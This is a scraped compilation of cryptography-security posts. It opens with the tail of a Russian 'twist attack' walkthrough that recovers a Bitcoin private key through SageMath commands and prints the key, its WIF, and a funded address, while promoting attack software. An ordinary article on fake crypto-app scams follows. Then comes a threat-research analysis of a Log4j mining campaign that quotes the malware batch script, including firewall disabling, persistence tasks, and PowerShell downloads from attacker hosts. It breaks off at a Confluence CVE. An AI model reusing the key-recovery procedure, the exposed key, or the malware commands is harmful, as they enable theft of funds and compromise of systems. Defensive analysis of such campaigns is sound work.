E2([3350296768277877304391506547616361976369787138559008027651808311357100316617, 72988900267653266243491077449097157591503403928437340215197819240911749073070]) Q22 = E2([112520741232779465095566100761481226712887911875949213866586208031790667764851, 67821409607391406974451792678186486803604797717916857589728259410989018828088]) Q31 = E3([19221018445349571002768878066568778104356611670224206148889744255553888839368, 51911948202474460182474729837629287426170495064721963100930541018009108314113]) Q32 = E3([41890177480111283990531243647299980511217563319657594412233172058507418746086, 50666391602993122126388747247624601309616370399604218474818855509093287774278]) Q33 = E3([42268931450354181048145324837791859216268206183479474730830244807012122440868, 106203099208900270966718494579849900683595613889332211248945862977592813439569]) Q41 = E4([54499795016623216633513895020095562919782606390420118477101689814601700532150, 105485166437855743326869509276555834707863666622073705127774354124823038313021]) Q61 = E6([62124953527279820718051689027867102514830975577976669973362563656149003510557, 100989088237897158673340534473118617341737987866593944452056172771683426720481]) Q62 = E6([86907281605062616221251901813989896824116536666883529138776205878798949076805, 19984923138198085750026187300638434023309806045826685297245727280111269894421]) Q63 = E6([66063410534588649374156935204077330523666149907425414249132071271750455781006, 25315648259518110320341360730017389015499807179224601293064633820188666088920]) Q64 = E6([109180854384525934106792159822888807664445139819154775748567618515646342974321, 102666617356998521143219293179463920284010473849613907153669896702897252016986]) RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000 Теперь добавим полученные точки secp256k1 Для этого откроем Python-script: discrete.py Для того чтобы запустить Python-script: discrete.py установим SageMath Команда установки: sudo apt-get update sudo apt-get install -y python3-gmpy2 yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath Проверим установку SageMath по команде: sage -v SageMath version 9.0 Чтобы решить дискретное логарифмирование (Pollard's rho algorithm for logarithms) запустим Python-script: discrete.py Команда запуска: sage -python3 discrete.py Результат: Discrete_log_rho: 14996641256 1546 19575 31735 9071789 145517682 11552 7151 3370711 10797447604 10120546250224 PRIVATE KEY: 3160389728152122137789469305939632411648887242506549174582525524562820572318 privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64]) Конвертируем приватный ключ в HEX формат Десятичный формат приватного ключа был сохранен в файл: privkey.txt Запустим Python-script: privkey2hex.py python3 privkey2hex.py cat privkey2hex.txt Откроем полученный файл: privkey2hex.txt Приватный ключ в HEX формате: PrivKey = 06fcb79a2eabffa519509e43b7de95bc2df15ca48fe6be29f9160bcd6ac1a49e Откроем bitaddress и проверим: ADDR: 1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx WIF: KwTHx3AhV8qiN6qyfG1D85TGEeUBiaMUjnQ11eVLP5NAfiVNLLmS HEX: 06FCB79A2EABFFA519509E43B7DE95BC2DF15CA48FE6BE29F9160BCD6AC1A49E https://live.blockcypher.com/btc/address/1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx/ BALANCE: $ 902.52 Исходный код ATTACKSAFE SOFTWARE Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/pOviZOYItv4 Источник: https://cryptodeep.ru/twist-attack-2 Криптоанализ
  2. CRYPTO DEEP TECH The rise of fake cryptocurrency apps and how to avoid them. Scammers are using fake crypto apps to steal funds from investors. Some malicious apps find their way into official app stores. And, according to the latest fraud report, fraudsters are using fake crypto apps to steal money from unsuspecting crypto investors. It highlights that American investors have lost approximately $42.7 million to swindlers through fake apps. The schemes reportedly take advantage of heightened interest in cryptocurrencies, especially during bull market runs, to beguile crypto users. How fake crypto app scammers lure users Fake crypto app scammers use myriad techniques to entice investors. The following is a breakdown of some of them. Social engineering schemes Some fake crypto app scammer networks use social engineering strategies to entice victims. In many cases, the fraudsters befriend the victims through social platforms such as dating sites and then trick them into downloading apps that appear to be functional cryptocurrency trading apps. The scammers then convince users to transfer funds to the app. The funds are, however, “locked in” once the transfer is made, and the victims are never allowed to withdraw money. In some cases, the scammers lure victims using outlandish high-yield claims. The ruse comes to an end when the victims realize that they can’t redeem their funds. Speaking to Cointelegraph earlier this week, Rick Holland, chief information security officer of Digital Shadows — a digital risk protection firm — underscored that social engineering remains a top strategy among crooks because it requires minimal effort. “Relying upon the tried-and-true method of social engineering is far more practical and lucrative,” he said. The cybersecurity manager added that social engineering makes it easy for scammers to target high-net-worth individuals. Context: Bob ( fake name, real person) received a text claiming to be from his exchange. The message states that due to the recent ban on crypto in China, all users must withdraw their funds to a defi wallet. The text also included a link to the wallet where Bob can transfer his funds. After downloading the wallet, Bob removed all of his funds from the exchange. More than $10 million in ERC20-USDT were transferred. Little did Bob know that he had just become the victim of a phishing scam. Bob reached out to us for help recovering his funds. Bob wasn’t the first person to contact us regarding these scams. Scams are becoming more common as interest in cryptocurrency grows. According to data from our MistTrack service, more than 60% of all reported hacks were related to fake wallets. There are several ways to protect yourself against phishing attacks: Never click on any link from an unknown source, even if it appears legitimate. Scammers frequently send emails or texts containing links to a fake wallet. Always go to the original website rather than clicking on sponsored ads. Scammers often purchase ad space on search engines to promote their counterfeit website that often appears genuine. Scammers will regularly message you pretending to help. After gaining your trust, they will send you a link to download their app and transfer funds to it. They will often fabricate why you cannot withdraw funds unless you deposit additional funds into it. Many who fall victim to these scams never receive their money back. Scammers would often pose as support from Metamask. They would pretend to help anyone currently having difficulties using Metamask. After gaining their trust, they would send over a link asking the victim to input their seed phase. Metamask will NEVER ask for your seed phrase or private key. This is what a fake Metamask wallet might look like. In-depth analysis Our team begins to analyze and research the information provided by these victims. According to our ongoing investigation, tens of thousands of victims had their assets stolen from these phishing scams. So far, the total amount stolen exceeds $1.3 billion. These are the only funds reported to SlowMist, and we only counted ETH, BTC, TRX, ERC20-USDT, and TRC20-USDT. The graph below depicts the number of reported cases to us during November. One victim provided us with the Tron address of the scammer. Using MistTrack, our team was able to track down and analyze the scammer’s address. It showed an additional 14 addresses that had transferred funds to this address. We can assume that these addresses also fell victims to this phishing scam. In total, the scammer was able to walk away with over $250,000 in Trc20-USDT. Which they later distributed to various Binance accounts. We followed one of these Binance accounts and discovered it had over $600,000 in TRC20 — USDT. Imagine the total amount stolen if this was just one of the addresses the scammer uses. As we investigated further into this account, we discovered more illegal activity associated with it. According to our AML(anti-money laundering) software, a BTC address associated with this account (32q…fia) was used for extortion. Through the investigation of this address, we concluded that these phishing schemes were not isolated events but rather part of a larger global scale. Furthermore, our research indicates that the scammer will frequently transfer portions of the funds to multiple exchanges and to another scammer wallet with a significant amount of transactions to confuse our analysis. Recognizable brand names Some fake crypto app scammers have resorted to using recognizable brand names to push fake apps because of the trust and authority that they wield. In one case highlighted in the latest crypto crime report, cybercriminals posing as YiBit employees recently hoodwinked investors out of some $5.5 million after convincing them to download a bogus YiBit crypto trading app. Unbeknown to the investors, the actual YiBit crypto exchange firm ceased operations in 2018. Fund transfers made to the fake app were stolen. In another case outlined in the report, phishers using the Supay brand name, which is associated with an Australian crypto company, swindled 28 investors out of millions of dollars. The ploy, which ran between Nov. 1 and Nov. 26, caused $3.7 million in losses. Such schemes have been going on for years, but many incidences go unreported due to the lack of proper recourse channels, especially in jurisdictions that shun cryptocurrencies. Besides the U.S., investigations in other major jurisdictions such as India have in the recent past uncovered elaborate fake crypto app schemes. According to a report published by the CloudSEK cybersecurity company in June, a newly discovered fake crypto app scheme involving numerous cloned apps and domains caused Indian investors to lose at least $128 million. Distributing fake apps through official app stores Fake crypto app scammers sometimes use official app stores to distribute dodgy applications. Some of the apps are designed to collect user credentials that are then used to unlock crypto accounts on corresponding official platforms. Others claim to offer secure wallet solutions that can be used to store a diverse range of cryptocurrencies but pilfer funds once a deposit is made. While platforms such as Google Play Store constantly review apps for integrity issues, it is still possible for some fake apps to slip through the cracks. One of the latest methods used by scammers to accomplish this is registering as app developers on popular mobile app stores such as the Apple App Store and Google Play Store and then uploading legitimate-looking apps. In 2021, a fake Trezor app masquerading as a wallet created by SatoshiLabs used this strategy to get published on both Apple App Store and Google Play Store. The app claimed to provide users with direct online access to their Trezor hardware wallets without needing to connect their Trezor dongle to a computer. Victims who downloaded the fake Trezor app were obligated to submit their wallet seed phrase to start using the service. A seed phrase is a string of words that can be used to access a cryptocurrency wallet on the blockchain. The submitted details allowed the thieves behind the fake app to loot user funds. According to a statement provided by Apple, the fake Trezor app was published on its store through a deceptive bait-and-switch maneuver. The app developers are alleged to have initially submitted the app as a cryptography application designed to encrypt files but later on converted it to a cryptocurrency wallet app. Apple said that it was not aware of the change until users reported it. Speaking to Cointelegraph earlier this week, Chris Kline, co-founder of Bitcoin IRA — a crypto retirement investment service — said that despite such incidents, major tech companies in the space were resolute in fighting fake crypto apps because of the potential damage to their integrity. He said: “Tech companies are always looking for better education and security for their users. The most reputable players today put security at the forefront of their roadmaps. Users need reassurance that their digital assets are safe and providers are keeping security top of mind.” That said, the fake app problem is more prevalent in non-official app stores. Cryptocurrency is risky enough without having to worry about scams. No matter which one you choose, you will deal with volatile values. Throw in some crooks, and the risk goes up exponentially. Social media is a goldmine for scammers to find new victims. Now, fake crypto ads are circulating on Facebook and other platforms. The ads use images of well-known industry leaders to lure people into buying crypto that doesn’t exist. Cybersecurity researchers recently found 40 copycat sites designed to look like legitimate crypto services. The sites advertise crypto wallet apps that are anything but legitimate. Keep reading to find out the risks and protect your finances. Watch your wallet Cryptocurrency wallets are physical or digital storage devices for your cryptocurrency. The wallets themselves hold public and private keys, which give you access to your crypto. How to spot a fake crypto app Fake cryptocurrency apps are designed to resemble legitimate apps as closely as possible. As a crypto investor, one should be able to discern between legitimate and fake apps to avoid unnecessary losses. The following is a breakdown of some of the things to look out for when trying to ascertain the authenticity of a mobile crypto application. Evidence shows that a crook is recruiting partners to distribute these bad apps via telemarketing, social media, advertisement, SMS, third-party channels, fake websites and more. ESET researchers also uncovered malicious wallets being distributed via legitimate Chinese websites, with articles containing links to fake wallet apps. The posts used real wallet names such as Coinbase, imToken, Bitpie, MetaMask, TokenPocket, OneKey and Trust Wallet but led to copycat websites. A thief used another legitimate Chinese website to post an article about Beijing’s crypto ban. The author included a list of genuine crypto wallets to get around the ban, along with links to bogus websites with download links for fake apps. Different effects on iOS and Android The malware works differently depending on your operating system. The fake Android wallet apps target new crypto users who do not have a legitimate wallet app installed on their devices. If you already have an official wallet app, the malicious one won’t be installed due to Android security measures, which don’t let you replace an original app with one that isn’t legitimate. The copycat websites let Android users download the malicious apps from their servers even if they tap on the “Get it on Google Play” button. Following that, the app needs to be installed manually. When it comes to iOS, multiple versions of an app can be installed simultaneously. But due to Apple’s stricter screening process, you won’t find these malicious apps in the App Store. So if you are an Apple user, you’d have to install the malicious apps from a third-party store or click on malicious links found on places like social media. The websites for these apps let users download apps outside the official store, using a system Apple put in place for businesses and educational institutes to install custom apps without going through the App Store. You must then manually install these apps. Once the app is up and running, it appears to work like a legitimate crypto wallet. But it isn’t. Instead, it’s stealing the currency deposited into it. Spelling, icons and description The first step in ascertaining whether an app is legit is checking out the spelling and icon. Fake apps usually have a name and icon that looks similar to the legitimate one, but something is usually off. If the app or developer names are misspelled, for example, the software is most likely phony. A quick search about the app on the internet will help to confirm its legitimacy. It is also important to consider if the app has a Google Editor’s choice badge. The badge is a distinction provided by the Google Play editorial team to recognize developers and apps with outstanding quality. Apps with this badge are unlikely to be fake. Don’t be a victim Follow these tips to keep crypto scammers at bay: Use official apps from official app stores that contain links to official websites. Be wary of online ads for crypto. Research any wallet app you’re interested in. Look for reviews and information about the company behind the app. Before you buy crypto, read Kim’s eBook on the subject. Application permissions Counterfeit apps usually request more permissions than necessary. This ensures that they glean as much data as possible from victims’ devices. As such, users should be wary of apps that require off-center permissions, such as device administrator privileges. Such authorizations could give cybercriminals unfettered access to a device and allow them to intercept sensitive data that can be used to unlock financial accounts, including crypto wallets. Intrusive app permissions can be blocked via a phone system’s privacy settings. Fake websites Scammers sometimes create fake cryptocurrency trading platforms or fake versions of official crypto wallets to trick unsuspecting victims. These fake websites usually have similar but slightly different domain names from the sites they attempt to mimic. They look very similar to legitimate sites, making it difficult to tell the difference. Fake crypto sites often operate in one of two ways: As phishing pages: All the details you enter, such as your crypto wallet’s password and recovery phrase and other financial information, end up in the scammers’ hands. As straightforward theft: Initially, the site may allow you to withdraw a small amount of money. As your investments seem to perform well, you might invest more money in the site. However, when you subsequently want to withdraw your money, the site either shuts down or declines the request. Phishing scams Crypto phishing scams often target information relating to online wallets. Scammers target crypto wallet private keys, which are required to access funds within the wallet. Their method of working is similar to other phishing attempts and related to the fake websites described above. They send an email to lure recipients to a specially created website asking them to enter private key information. Once the hackers have acquired this information, they steal the cryptocurrency in those wallets. Pump and dump schemes This involves a particular coin or token being hyped by fraudsters through an email blast or social media such as Twitter, Facebook, or Telegram. Not wanting to miss out, traders rush to buy the coins, driving up the price. Having succeeded in inflating the price, the scammers then sell their holdings – which causes a crash as the asset’s value sharply declines. This can happen within minutes. Fake apps Another common way scammers trick cryptocurrency investors is through fake apps available for download through Google Play and the Apple App Store. Although these fake apps are quickly found and removed, that doesn’t mean the apps aren’t impacting many bottom lines. Thousands of people have downloaded fake cryptocurrency apps. Fake celebrity endorsements Crypto scammers sometimes pose as or claim endorsements from celebrities, businesspeople, or influencers to capture the attention of potential targets. Sometimes, this involves selling phantom cryptocurrencies that don’t exist to novice investors. These scams can be sophisticated, involving glossy websites and brochures that appear to show celebrity endorsements from household names such as Elon Musk. Giveaway scams This is where scammers promise to match or multiply the cryptocurrency sent to them in what is known as a giveaway scam. Clever messaging from what often looks like a valid social media account can create a sense of legitimacy and spark a sense of urgency. This supposed ‘once-in-a-lifetime’ opportunity can lead people to transfer funds quickly in the hope of an instant return. Blackmail and extortion scams Another method scammers use is blackmail. They send emails that claim to have a record of adult websites visited by the user and threaten to expose them unless they share private keys or send cryptocurrency to the scammer. Cloud mining scams Cloud mining refers to companies that allow you to rent mining hardware they operate in exchange for a fixed fee and a share of the revenue you will supposedly make. In theory, this allows people to mine remotely without buying expensive mining hardware. However, many cloud mining companies are scams or, at best, ineffective – in that you end up losing money or earning less than was implied. Fraudulent initial coin offerings (ICOs) An initial coin offering or ICO is a way for start-up crypto companies to raise money from future users. Typically, customers are promised a discount on the new crypto coins in exchange for sending active cryptocurrencies like bitcoin or another popular cryptocurrency. Several ICOs have turned out to be fraudulent, with criminals going to elaborate lengths to deceive investors, such as renting fake offices and creating high-end marketing materials. How to spot cryptocurrency scams So, how to spot a crypto scam? Warning signs to look out for include: Promises of guaranteed returns: No financial investment can guarantee future returns because investments can go down as well as up. Any crypto offering that promises you will definitely make money is a red flag. A poor or non-existent whitepaper: Every cryptocurrency should have a whitepaper since this is one of the most critical aspects of an initial coin offering. The whitepaper should explain how the cryptocurrency has been designed and how it will work. If the whitepaper doesn’t make sense – or worse, doesn’t exist – then tread carefully. Excessive marketing: All businesses promote themselves. But one way that crypto fraudsters attract people is by investing in heavy marketing – online advertising, paid influencers, offline promotion, and so on. This is designed to reach as many people as possible in the shortest time possible – to raise money fast. If you feel that the marketing for a crypto offering seems heavy-handed or makes extravagant claims without backing them up, pause and do further research. Unnamed team members: With most investment businesses, it should be possible to find out who the key people behind it are. Usually, this means easy-to-find biographies of the people who run the investment plus an active presence on social media. If you can’t find out who is running a cryptocurrency, be cautious. Free money: Whether in cash or cryptocurrency, any investment opportunity promising free money is likely to be fake. How to protect yourself from cryptocurrency scams Many crypto frauds are sophisticated and convincing. Here are some steps you can take to protect yourself: Protect your wallet: To invest in cryptocurrency, you need a wallet with private keys. If a firm asks you to share your keys to participate in an investment opportunity, it’s highly likely to be a scam. Keep your wallet keys private. Keep an eye on your wallet app: The first time you transfer money, send only a small amount to confirm the legitimacy of a crypto wallet app. If you’re updating your wallet app and you notice suspicious behavior, terminate the update, and uninstall the app. Only invest in things you understand: If it’s not clear to you how a particular cryptocurrency works, then it’s best to pause and do further research before you decide whether to invest. Take your time: Scammers often use high-pressure tactics to get you to invest your money quickly – for example, by promising bonuses or discounts if you participate straightaway. Take your time and carry out your own research before investing any money. Be wary of social media adverts: Crypto scammers often use social media to promote their fraudulent schemes. They may use unauthorized images of celebrities or high-profile businesspeople to create a sense of legitimacy, or they may promise giveaways or free cash. Maintain a healthy skepticism when you see crypto opportunities promoted on social media and do your due diligence. Ignore cold calls: If someone contacts you out of the blue to sell you a crypto investment opportunity, it’s probably a scam. Never disclose personal information or transfer money to someone who contacts you in this way. Only download apps from official platforms: Although fake apps can end up in the Google Play Store or Apple App Store, it is safer to download apps from these platforms than elsewhere. Do your research: The most popular cryptocurrencies are not scams. But if you haven’t heard of a particular cryptocurrency, research it – see if there is a whitepaper you can read, find out who runs it and how it operates, and look for genuine reviews and testimonials. Look for an up-to-date and credible fake cryptocurrency list to check for scams. Is it too good to be true: Companies that promise guaranteed returns or to make you rich overnight are likely to be scams. If something seems too good to be true, tread carefully. Finally, as with any investment opportunity, never invest money you can’t afford to lose. Even if you’re not being scammed, cryptocurrency is volatile and speculative, so it’s essential to understand the risks. What to do if you fall victim to a crypto scam Falling victim to a cryptocurrency scam can be devastating, and it’s essential to act quickly if you have made a payment or disclosed personal information. Contact your bank immediately if you have: Made a payment using a debit or credit card. Made a payment via bank transfer. Shared personal details about yourself. Crypto fraudsters often sell the details they have captured to other criminals. So, it’s essential to change your usernames and passwords across the board, to prevent further damage. If you are the victim of a social media crypto scam, you can report it to the relevant social media platform. Depending on where you live, you can report frauds to the relevant body in your jurisdiction – for example, in the US, that would be the Federal Trade Commission. Other countries have their own equivalents. The number of downloads The number of times that an app has been downloaded is usually an indicator of how popular it is. Apps from reputable developers typically have millions of downloads and thousands of positive reviews. Inversely, apps with just a few thousand downloads require greater scrutiny. Confirming authenticity by contacting support If unsure about an application, contacting support through the company’s official website could help to avoid financial losses due to fraud. Furthermore, authentic apps can be downloaded from a company’s official website. Cryptocurrencies are underpinned by relatively new technology, so it is only natural that there are teething problems when it comes to use and adoption. Unfortunately, in recent years, black hats have targeted naïve crypto enthusiasts using fake crypto apps. While the problem is likely to persist for several years, increased scrutiny by tech companies is likely to temper the issue in the long run. Literature: Investigation of Cryptocurrency Wallets on iOS and Android Mobile Devices for Potential Forensic Artifacts Angelica Montanez https://cryptodeep.ru/doc/Montanez-Angelica_Final-Research-Paper.pdf Summary This type of fraudulent activity is not only prevalent at the moment, but it is also on the rise. Every day, a growing number of people fall victim to this. Users should always be cautious and suspicious of phishing scams. GitHub Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/EkU8YhB91MI Source: https://cryptodeep.ru/crypto-wallet-protection Криптоанализ
  3. CRYPTO DEEP TECH Background on Log4j Alibaba Cloud Security Team publicly disclosed a critical vulnerability (CVE-2021-44228) enabling unauthenticated remote code execution against multiple versions of Apache Log4j2 (Log4Shell). Vulnerable servers can be exploited by attackers connecting via any protocol such as HTTPS and sending a specially crafted string. Log4j crypto-mining campaign Darktrace detected crypto-mining on multiple customer deployments which occurred as a result of exploiting this Log4j vulnerability. In each of these incidents, exploitation occurred via outbound SSL connections which appear to be requests for base64-encoded PowerShell scripts to bypass perimeter defenses and download batch (.bat) script files, and multiple executables that install crypto-mining malware. The activity had wider campaign indicators, including common hard-coded IPs, executable files, and scripts. The attack cycle begins with what appears to be opportunistic scanning of Internet-connected devices looking for VMWare Horizons servers vulnerable to the Log4j exploit. Once a vulnerable server is found, the attacker makes HTTP and SSL connections to the victim. Following successful exploitation, the server performs a callback on port 1389, retrieving a script named mad_micky.bat. This achieves the following: Disables Windows firewall by setting all profiles to state=off ‘netsh advfirewall set allprofiles state off’ Searches for existing processes that indicate other miner installs using ‘netstat -ano | findstr TCP’ to identify any process operating on ports :3333, :4444, :5555, :7777, :9000 and stop the processes running A new webclient is initiated to silently download wxm.exe Scheduled tasks are used to create persistence. The command ‘schtasks /create /F /sc minute /mo 1 /tn –‘ schedules a task and suppresses warnings, the task is to be scheduled within a minute of command and given the name, ‘BrowserUpdate’, pointing to malicious domain, ‘b.oracleservice[.]top’ and hard-coded IP’s: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080 Registry keys are added in RunOnce for persistence: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d In at least two cases, the mad_micky.bat script was retrieved in an HTTP connection which had the user agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). This was the first and only time this user agent was seen on these networks. It appears this user agent is used legitimately by some ASUS devices with fresh factory installs; however, as a new user agent only seen during this activity it is suspicious. Following successful exploitation, the server performs a callback on port 1389, to retrieve script files. In this example, /xms.ps1 a base-64 encoded PowerShell script that bypasses execution policy on the host to call for ‘mad_micky.bat’: Figure 1: Additional insight on PowerShell script xms.ps1 The snapshot details the event log for an affected server and indicates successful Log4j RCE that resulted in the mad_micky.bat file download: Figure 2: Log data highlighting mad_micky.bat file Additional connections were initiated to retrieve executable files and scripts. The scripts contained two IP addresses located in Korea and Ukraine. A connection was made to the Ukrainian IP to download executable file xm.exe, which activates the miner. The miner, XMRig Miner (in this case) is an open source, cross-platform mining tool available for download from multiple public locations. The next observed exe download was for ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4). Figure 3: Additional insight regarding XMRig executable The connection to the Korean IP involved a request for another script (/2.ps1) as well as an executable file (LogBack.exe). This script deletes running tasks associated with logging, including SCM event log filter or PowerShell event log consumer. The script also requests a file from Pastebin, which is possibly a Cobalt Strike beacon configuration file. The log deletes were conducted through scheduled tasks and WMI included: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer. Config file (no longer hosted): IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’) The second file requested from Pastebin, though no longer hosted by Pastebin, is part of a schtasks command, and so probably used to establish persistence: schtasks /create /sc MINUTE /mo 5 /tn “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'” /F /ru System The executable file Logback.exe is another XMRig mining tool. A config.json file was also downloaded from the same Korean IP. After this cmd.exe and wmic commands were used to configure the miner. These file downloads and miner configuration were followed by additional connections to Pastebin. Figure 4: OSINT correlation of mad_micky.bat file Process specifics — mad_micky.bat file Install set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup” looking for the following utilities: powershell, find, findstr, tasklist, sc set “LOGFILE=%USERPROFILE%\mimu6\xmrig.log” if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK) set port=10001 Preparing miner echo [*] Removing previous mimu miner (if any) sc stop gado_miner sc delete gado_miner taskkill /f /t /im xmrig.exe taskkill /f /t/im logback.exe taskkill /f /t /im network02.exe :REMOVE_DIR0 echo [*] Removing “%USERPROFILE%\mimu6” directory timeout 5 rmdir /q /s “USERPROFILE%\mimu6” >NUL 2>NUL IF EXIST “%USERPROFILE%\mimu6” GOTO REMOVE_DIR0 Download of XMRIG echo [*] Downloading MoneroOcean advanced version of XMRig to “%USERPROFILE%\xmrig.zip” powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/xmrig.zip’, ;%USERPROFILE%\xmrig.zip’)” echo copying to mimu directory if errorlevel 1 ( echo ERROR: Can’t download MoneroOcean advanced version of xmrig goto MINER_BAD) Unpack and install echo [*] Unpacking “%USERPROFILE%\xmrig.zip” to “%USERPROFILE%\mimu6” powershell -Command “Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘%USERPROFILE%\xmrig.zip’, ‘%USERPROFILE%\mimu6’)” if errorlevel 1 ( echo [*] Downloading 7za.exe to “%USERPROFILE%za.exe” powershell -Command “$wc = New-Object System.Net.WebClient; $wc.Downloadfile(‘http://141.85.161[.]18/7za.txt’, ‘%USERPROFILE%za.exe’” powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”url\”: *\”.*\”,’, ‘\”url\”: \”207.38.87[.]6:3333\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”user\”: *\”.*\”,’, ‘\”user\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”pass\”: *\”.*\”,’, ‘\”pass\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”max-cpu-usage\”: *\d*,’, ‘\”max-cpu-usage\”: 100,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” set LOGFILE2=%LOGFILE:\=\\% powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”log-file\”: *null,’, ‘\”log-file\”: \”%LOGFILE2%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” if %ADMIN% == 1 goto ADMIN_MINER_SETUP if exist “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” ( set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” goto STARTUP_DIR_OK ) if exist “%USERPROFILE%\Start Menu\Programs\Startup” ( set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup” goto STARTUP_DIR_OK ) echo [*] Downloading tools to make gado_miner service to “%USERPROFILE%\nssm.zip” powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘[http://141.85.161[.]18/nssm.zip’, ‘%USERPROFILE%\nssm.zip’)” if errorlevel 1 ( echo ERROR: Can’t download tools to make gado_miner service exit /b 1 Detecting the campaign using Darktrace The key model breaches Darktrace used to identify this campaign include compromise-focussed models for Application Protocol on Uncommon Port, Outgoing Connection to Rare From Server, and Beaconing to Rare Destination. File-focussed models for Masqueraded File Transfer, Multiple Executable Files and Scripts from Rare Locations, and Compressed Content from Rare External Location. Cryptocurrency mining is detected under the Cryptocurrency Mining Activity models. The models associated with Unusual PowerShell to Rare and New User Agent highlight the anomalous connections on the infected devices following the Log4j callbacks. Customers with Darktrace’s Autonomous Response technology, Antigena, also had actions to block the incoming files and scripts downloaded and restrict the infected devices to normal pattern of life to prevent both the initial malicious file downloads and the ongoing crypto-mining activity. Appendix Darktrace model detections Anomalous Connection / Application Protocol on Uncommon Port Anomalous Connection / New User Agent to IP Without Hostname Anomalous Connection / PowerShell to Rare External Anomalous File / EXE from Rare External location Anomalous File / Masqueraded File Transfer Anomalous File / Multiple EXE from Rare External Locations Anomalous File / Script from Rare External Location Anomalous File / Zip or Gzip from Rare External Location Anomalous Server Activity / Outgoing from Server Compliance / Crypto Currency Mining Activity Compromise / Agent Beacon (Long Period) Compromise / Agent Beacon (Medium Period) Compromise / Agent Beacon (Short Period) Compromise / Beacon to Young Endpoint Compromise / Beaconing Activity To External Rare Compromise / Crypto Currency Mining Activity Compromise / Sustained TCP Beaconing Activity To Rare Endpoint Device / New PowerShell User Agent Device / Suspicious Domain MITRE ATT&CK techniques observed IoCs On May 31, a critical unpatched vulnerability, which affects all confluence server and data center supported versions was reported to Atlassian by Volexity, a security company. Atlassian warned their customers of the critical vulnerability on June 2 and issued a patch a day later. CISA added this vulnerability to their list of Known Exploited Vulnerabilities on June 3. Check Point released a dedicated protection to prevent an attack exploiting this vulnerability and advises customers to patch the affected systems. The Vulnerability The vulnerability in the Atlassian Confluence and Data Center, designated as CVE-2022-26134, may lead to an unauthenticated Object-Graph Navigation Language (OGNL) expression injection attack. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary code on the target server by placing a malicious payload in the URI. Figure 1: Malicious payload that exploits 